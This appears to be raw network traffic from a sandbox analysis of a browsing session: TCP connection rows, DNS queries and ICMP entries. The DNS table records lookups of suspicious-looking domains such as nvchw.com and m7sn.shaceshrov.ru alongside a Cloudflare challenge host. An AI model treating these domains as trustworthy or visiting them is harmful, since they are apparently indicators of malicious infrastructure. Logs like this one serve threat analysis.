                                                                  Jan 13, 2025 22:37:25.779591084 CET49747443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:25.779656887 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.779902935 CET49747443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:25.780103922 CET49747443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:25.780127048 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.245592117 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.250690937 CET49747443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:26.250716925 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.251076937 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.254314899 CET49747443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:26.254367113 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.254689932 CET49747443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:26.269886017 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:26.269936085 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.270061016 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:26.270276070 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:26.270288944 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.295417070 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.393976927 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.394188881 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.394263983 CET49747443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:26.394850016 CET49747443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:26.394885063 CET44349747104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.751589060 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.751892090 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:26.751900911 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.752362967 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.752729893 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:26.752813101 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.752892971 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:26.752985954 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:26.753025055 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:26.753138065 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:26.753160954 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.025971889 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.026015043 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.026057005 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.026139975 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.026149988 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.026211023 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.026472092 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.026536942 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.026583910 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.026588917 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.026643038 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.030664921 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.073268890 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.112662077 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.116461039 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.116491079 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.116514921 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.116528988 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.116585970 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.116611958 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.116637945 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.116647005 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.116657019 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.116974115 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.117022991 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.117105007 CET49748443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:27.117120028 CET44349748104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.119649887 CET49749443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:27.119698048 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.120704889 CET49749443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:27.120975018 CET49749443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:27.120992899 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.582711935 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.583035946 CET49749443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:27.583058119 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.583817005 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.584156990 CET49749443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:27.584243059 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.584336996 CET49749443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:27.627340078 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.715811968 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.715894938 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.716109991 CET49749443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:27.717518091 CET49749443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:27.717547894 CET44349749104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:27.835280895 CET4968080192.168.2.16192.229.211.108
                                                                  Jan 13, 2025 22:37:28.183168888 CET49678443192.168.2.1620.189.173.10
                                                                  Jan 13, 2025 22:37:29.425672054 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:29.425717115 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:29.425787926 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:29.426033020 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:29.426045895 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:29.603154898 CET49673443192.168.2.16204.79.197.203
                                                                  Jan 13, 2025 22:37:29.879021883 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:29.879328012 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:29.879344940 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:29.879636049 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:29.879910946 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:29.879975080 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:29.880060911 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:29.880115986 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:29.880125999 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:29.880209923 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:29.880233049 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.155719042 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.155787945 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.155813932 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.155844927 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.155864954 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:30.155891895 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.155905008 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:30.155919075 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.155956984 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:30.161237955 CET49750443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:30.161261082 CET44349750104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.202205896 CET49751443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:30.202253103 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.202358007 CET49751443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:30.202601910 CET49751443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:30.202610016 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.339858055 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.339968920 CET44349752104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:30.340071917 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.340384007 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.340420008 CET44349752104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:30.677198887 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.677653074 CET49751443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:30.677670002 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.677983999 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.678298950 CET49751443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:30.678355932 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.678431988 CET49751443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:30.723344088 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.812463045 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.812530041 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.812580109 CET49751443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:30.813474894 CET49751443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:30.813491106 CET44349751104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:30.822345972 CET44349752104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:30.822594881 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.822654009 CET44349752104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:30.823611975 CET44349752104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:30.823697090 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.823987961 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.823987961 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.824039936 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.824062109 CET44349752104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:30.824132919 CET49752443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.824326992 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.824361086 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:30.824435949 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.824624062 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:30.824630976 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:31.324069977 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:31.324400902 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:31.324414968 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:31.325258017 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:31.325321913 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:31.326539993 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:31.326581955 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:31.326720953 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:31.326726913 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:31.376312971 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:31.924185038 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:31.924290895 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:31.924345970 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:31.925384998 CET49753443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:31.925405025 CET44349753104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:32.059561968 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:32.059613943 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:32.059688091 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:32.059930086 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:32.059946060 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:32.554949045 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:32.557512999 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:32.557581902 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:32.559035063 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:32.559154987 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:32.559489965 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:32.559578896 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:32.560703993 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:32.560723066 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:32.613202095 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:32.645154953 CET4968080192.168.2.16192.229.211.108
                                                                  Jan 13, 2025 22:37:33.129887104 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:33.130194902 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:33.130387068 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:33.130784035 CET49756443192.168.2.16104.21.42.208
                                                                  Jan 13, 2025 22:37:33.130848885 CET44349756104.21.42.208192.168.2.16
                                                                  Jan 13, 2025 22:37:37.794380903 CET49678443192.168.2.1620.189.173.10
                                                                  Jan 13, 2025 22:37:42.246253967 CET4968080192.168.2.16192.229.211.108
                                                                  Jan 13, 2025 22:37:57.239406109 CET4969780192.168.2.16199.232.214.172
                                                                  Jan 13, 2025 22:37:57.239622116 CET4969880192.168.2.16199.232.214.172
                                                                  Jan 13, 2025 22:37:57.244999886 CET8049697199.232.214.172192.168.2.16
                                                                  Jan 13, 2025 22:37:57.245091915 CET4969780192.168.2.16199.232.214.172
                                                                  Jan 13, 2025 22:37:57.245160103 CET8049698199.232.214.172192.168.2.16
                                                                  Jan 13, 2025 22:37:57.245393038 CET4969880192.168.2.16199.232.214.172
                                                                  Jan 13, 2025 22:38:14.627710104 CET49797443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:38:14.627794027 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:14.627912998 CET49797443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:38:14.628220081 CET49797443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:38:14.628251076 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:15.282079935 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:15.282670975 CET49797443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:38:15.282727957 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:15.283200026 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:15.285677910 CET49797443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:38:15.285772085 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:15.328207016 CET49797443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:38:25.194403887 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:25.194473028 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:25.194535971 CET49797443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:38:26.031044006 CET49797443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:38:26.031089067 CET44349797142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:38:47.468425035 CET4970080192.168.2.16184.30.131.245
                                                                  Jan 13, 2025 22:38:47.477896929 CET8049700184.30.131.245192.168.2.16
                                                                  Jan 13, 2025 22:38:47.477955103 CET4970080192.168.2.16184.30.131.245
                                                                  Jan 13, 2025 22:39:14.687506914 CET49804443192.168.2.16142.250.186.100
                                                                  Jan 13, 2025 22:39:14.687551022 CET44349804142.250.186.100192.168.2.16
                                                                  Jan 13, 2025 22:39:14.687701941 CET49804443192.168.2.16142.250.186.100
                                                                  Jan 13, 2025 22:39:14.688098907 CET49804443192.168.2.16142.250.186.100
                                                                  Jan 13, 2025 22:39:14.688107014 CET44349804142.250.186.100192.168.2.16
                                                                  Jan 13, 2025 22:39:15.344634056 CET44349804142.250.186.100192.168.2.16
                                                                  Jan 13, 2025 22:39:15.345093966 CET49804443192.168.2.16142.250.186.100
                                                                  Jan 13, 2025 22:39:15.345115900 CET44349804142.250.186.100192.168.2.16
                                                                  Jan 13, 2025 22:39:15.345808983 CET44349804142.250.186.100192.168.2.16
                                                                  Jan 13, 2025 22:39:15.346239090 CET49804443192.168.2.16142.250.186.100
                                                                  Jan 13, 2025 22:39:15.346328020 CET44349804142.250.186.100192.168.2.16
                                                                  Jan 13, 2025 22:39:15.397306919 CET49804443192.168.2.16142.250.186.100
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 13, 2025 22:37:09.732017994 CET53523731.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:09.856730938 CET53594681.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:10.713233948 CET6443753192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:10.713449955 CET6054853192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:10.864876986 CET53596871.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:11.755872965 CET6237353192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:11.755992889 CET5370853192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:11.763149977 CET53623731.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:11.763184071 CET53537081.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:12.717194080 CET4940753192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:12.717318058 CET5070453192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:12.723942041 CET53507041.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:12.724184990 CET53494071.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:17.226361990 CET4923053192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:17.226479053 CET6027053192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:17.238364935 CET53602701.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:17.268603086 CET53492301.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:18.238132954 CET6468753192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:18.238337994 CET5414953192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:18.291781902 CET53646871.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:18.292793036 CET53541491.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.182882071 CET5441553192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.183136940 CET6546553192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.183453083 CET6417853192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.183619022 CET5154453192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.183917999 CET6516053192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.184051037 CET6088853192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.190009117 CET53544151.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.190046072 CET53641781.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.190181017 CET53654651.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.190958023 CET53651601.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.191080093 CET53608881.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.191596985 CET53515441.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.915595055 CET5564353192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.915786028 CET5806853192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.922386885 CET53556431.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.922699928 CET53580681.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.947344065 CET6040553192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.947509050 CET6082153192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:20.954921007 CET53608211.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:20.955178022 CET53604051.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:21.538053989 CET6385053192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:21.538326979 CET6169953192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:21.545164108 CET53638501.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:21.545253038 CET53616991.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:21.570347071 CET6494053192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:21.570703030 CET5936653192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:21.577495098 CET53593661.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:21.577627897 CET53649401.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.251884937 CET6366753192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:23.252027035 CET5885653192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:23.258610964 CET53636671.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.258624077 CET53588561.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:27.969003916 CET53588251.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:30.187191963 CET4933853192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:30.188632011 CET4956753192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:30.324635029 CET53495671.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:30.339071989 CET53493381.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:31.932914972 CET6466453192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:31.933042049 CET6244653192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:31.936566114 CET5698153192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:31.936775923 CET6541553192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:32.034033060 CET53569811.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:32.069576025 CET53654151.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:33.005439043 CET4934153192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:33.005642891 CET5419753192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:33.013266087 CET53541971.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:35.088362932 CET6266553192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:35.088450909 CET5078853192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:35.121166945 CET53507881.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:36.255713940 CET5089553192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:36.255933046 CET6048353192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:37:36.262495041 CET53508951.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:36.262936115 CET53604831.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:40.996213913 CET53559781.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:37:47.023941040 CET53607181.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:38:09.480951071 CET53491851.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:38:09.731909990 CET53635811.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:38:15.000943899 CET138138192.168.2.16192.168.2.255
                                                                  Jan 13, 2025 22:38:23.257671118 CET6190253192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:38:23.257672071 CET5135153192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:38:39.324820042 CET53553861.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:39:14.678488970 CET6488953192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:39:14.678703070 CET6304553192.168.2.161.1.1.1
                                                                  Jan 13, 2025 22:39:14.686209917 CET53648891.1.1.1192.168.2.16
                                                                  Jan 13, 2025 22:39:14.686256886 CET53630451.1.1.1192.168.2.16
                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                  Jan 13, 2025 22:37:32.069645882 CET192.168.2.161.1.1.1c2bb(Port unreachable)Destination Unreachable
                                                                  Jan 13, 2025 22:37:35.084752083 CET192.168.2.161.1.1.1c2e8(Port unreachable)Destination Unreachable
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 13, 2025 22:37:10.713233948 CET192.168.2.161.1.1.10xd6a1Standard query (0)www.tiktok.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:10.713449955 CET192.168.2.161.1.1.10xdf96Standard query (0)www.tiktok.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:11.755872965 CET192.168.2.161.1.1.10x4e2cStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:11.755992889 CET192.168.2.161.1.1.10x8969Standard query (0)google.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:12.717194080 CET192.168.2.161.1.1.10x4b70Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:12.717318058 CET192.168.2.161.1.1.10x2bc8Standard query (0)www.google.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:17.226361990 CET192.168.2.161.1.1.10xf78Standard query (0)nvchw.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:17.226479053 CET192.168.2.161.1.1.10xab5cStandard query (0)nvchw.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:18.238132954 CET192.168.2.161.1.1.10xace6Standard query (0)m7sn.shaceshrov.ruA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:18.238337994 CET192.168.2.161.1.1.10x7f72Standard query (0)m7sn.shaceshrov.ru65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.182882071 CET192.168.2.161.1.1.10x738aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.183136940 CET192.168.2.161.1.1.10x3d99Standard query (0)code.jquery.com65IN (0x0001)false
                                                                  Jan 13, 2025 22:37:20.183453083 CET192.168.2.161.1.1.10xb4afStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
